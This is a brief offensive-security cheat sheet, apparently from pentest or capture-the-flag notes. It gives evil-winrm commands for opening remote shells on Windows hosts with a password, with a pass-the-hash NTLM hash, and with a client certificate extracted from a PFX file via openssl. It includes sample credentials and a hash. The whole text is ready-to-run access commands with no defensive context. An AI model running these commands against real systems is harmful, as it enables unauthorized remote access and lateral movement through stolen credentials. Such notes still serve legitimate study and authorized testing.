Access#
evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i $target
# NTLM hash
evil-winrm -u Administrator -H '2b87e7c93a3e8a0ea4a581937016f341' -i $targetWith a cert file#
Extract cert and key from pfx file
openssl pkcs12 -in yourfile.pfx -clcerts -nokeys -out cert.pem -password pass:yourpassword
openssl pkcs12 -in yourfile.pfx -nocerts -out key.pem -nodes -password pass:yourpasswordGet a shell with cert
evil-winrm -S -u 'dev' -p 'supremelegacy' -c ./cert.pem -k ./key.pem -i $targetPass the hash#
evil-winrm -i $target -u "$user" -H "$hash"